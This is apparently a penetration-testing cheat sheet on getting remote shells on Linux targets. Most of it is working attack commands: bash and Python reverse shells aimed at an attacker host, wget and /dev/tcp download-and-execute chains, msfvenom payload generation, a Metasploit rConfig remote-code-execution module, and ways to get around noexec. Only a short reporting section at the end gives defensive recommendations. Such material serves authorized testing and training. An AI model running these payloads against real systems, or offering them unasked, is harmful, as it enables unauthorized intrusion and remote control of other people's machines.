Shell Infiltrate Linux

🛡️ Methodology Checklist

• Identify remote code execution vector (command injection, LFI, webshell, exploit)
• Select shell payload matching execution context
• Bash reverse: bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1
• Python: python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('[LHOST]',[LPORT]));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"
• Perl: perl -e "use Socket;..."
• Start listener before executing payload
• Stabilise shell immediately after connection

---

🎯 Operational Context

Use when: Delivering payload to Linux target — select transfer method based on what’s available: curl, wget, Python HTTP, SCP, /dev/tcp. Think Dumber First: wget http://[LHOST]/shell.elf -O /tmp/s && chmod +x /tmp/s && /tmp/s — three commands. Host file with python3 -m http.server 80. If wget/curl blocked, try /dev/tcp: cat < /dev/tcp/[LHOST]/80 > /tmp/s. Skip when: Target has no outbound connectivity — use local exploit or exploit delivery chain instead.

---

⚡ Tactical Cheatsheet

Command	Tactical Outcome
ping [TARGET_IP]	Check TTL: ~64 = Linux/Unix
nmap -sC -sV [TARGET_IP]	Enumerate services and versions
searchsploit [application] [version]	Search local exploit DB
msf6 > search rconfig	Search Metasploit for application exploit
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce	rConfig 3.9.6 authenticated file upload RCE
set RHOSTS [TARGET_IP]; set LHOST tun0; exploit	Run Linux web app exploit
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f elf > shell.elf	Generate Linux ELF reverse shell
chmod +x shell.elf && ./shell.elf	Execute generated payload
python -c 'import pty; pty.spawn("/bin/sh")'	Upgrade to TTY after catching shell
which python python3 perl ruby lua gcc	Identify available languages on target

---

🔬 Deep Dive & Workflow

Linux Infiltration Methodology

Answer these four questions before choosing an attack vector:

1. Distribution — Ubuntu, CentOS, Debian? Affects package availability and kernel exploits
2. Languages — Python, Perl, PHP, GCC? Determines payload options
3. Function — Web server, DB, internal tool? Determines attack surface
4. Applications — CMS, network manager, API? Look up CVEs for specific versions

Service Enumeration → Exploitation

# Standard service scan
nmap -sC -sV [TARGET_IP]
 
# Key findings to focus on:
# - Port 80/443: Web apps → look for CMS, version numbers in footers/headers
# - Port 8080/8443: Tomcat, Jenkins, alternative web
# - Port 3306: MySQL → default creds attempt
# - Port 21: FTP → anonymous login attempt

Web Application Exploit Workflow (rConfig Example)

# 1. Find version in UI footer or page source
# 2. Search for exploit
msf6 > search rconfig
msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
 
# 3. Configure
set RHOSTS 10.129.201.101
set LHOST tun0
exploit

What the exploit does:

1. Checks rConfig version
2. Logs in (default/weak creds)
3. Uploads a randomized PHP payload
4. Triggers it via HTTP access
5. Deletes the file (auto-cleanup) Result: Meterpreter session opened

Manual Module Installation

If Metasploit lacks a module, manually install from Rapid7 GitHub:

# Place in user module path:
~/.msf4/modules/exploits/linux/http/
 
# Or system path:
/usr/share/metasploit-framework/modules/exploits/linux/http/
 
# Update MSF module database:
apt update && apt install metasploit-framework

Post-Exploitation: From Non-TTY to Shell

After catching a shell from a web exploit, you often land in a limited non-TTY environment:

# No prompt, no su, no interactive editors
# Fix with Python:
which python python3
python -c 'import pty; pty.spawn("/bin/sh")'
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Prompt changes from blank to sh-4.2$ or bash-4.2$ — fully interactive.

Footprinting Enumeration Before Exploitation

• Check /robots.txt and page source for version numbers
• Use Wappalyzer or whatweb to fingerprint technology stack
• Google: [application] [version] exploit / [CVE] PoC
• Check searchsploit [application] for local exploit-db entries

---

🛠️ Troubleshooting & Edge Cases

Problem	Cause	Fix
wget/curl not available	Minimal OS install	Use /dev/tcp: exec 3<>/dev/tcp/[LHOST]/80; echo -e 'GET /shell HTTP/1.0\r\n' >&3; cat <&3 > /tmp/s
File downloads but won’t execute	noexec on /tmp	Copy to /dev/shm/ or /var/tmp/; or execute directly: bash /tmp/script.sh
HTTP server returns connection refused	Python server not started	Start: python3 -m http.server 80 in directory with payload
SCP transfer fails	SSH key auth required	Use password: scp -o PreferredAuthentications=password payload [USER]@[TARGET]:/tmp/
Payload checksum mismatch after transfer	Transfer corruption	Verify: compare md5sum /tmp/payload on target vs local; use --content-disposition with wget

---

📝 Reporting Trigger

Finding Title: Payload Delivery to Linux Target Achieves Code Execution Impact: Successful payload delivery and execution on Linux target provides attacker-controlled process running under target service account with access to local credentials, network, and filesystem. Root Cause: Unrestricted outbound HTTP from server workloads allows payload retrieval. No integrity verification of downloaded content before execution. Recommendation: Implement outbound HTTP proxy with allowlisting for server workloads. Mount /tmp with noexec flag. Deploy file integrity monitoring. Apply SELinux/AppArmor profiles to restrict spawned process capabilities.

---

🔗 Related Nodes

• Shell_Bind_Reverse
• Payloads_MSF_Framework
• Shell_Interactive_Spawning
• Shell_Stabilization
• Web_Shell_PHP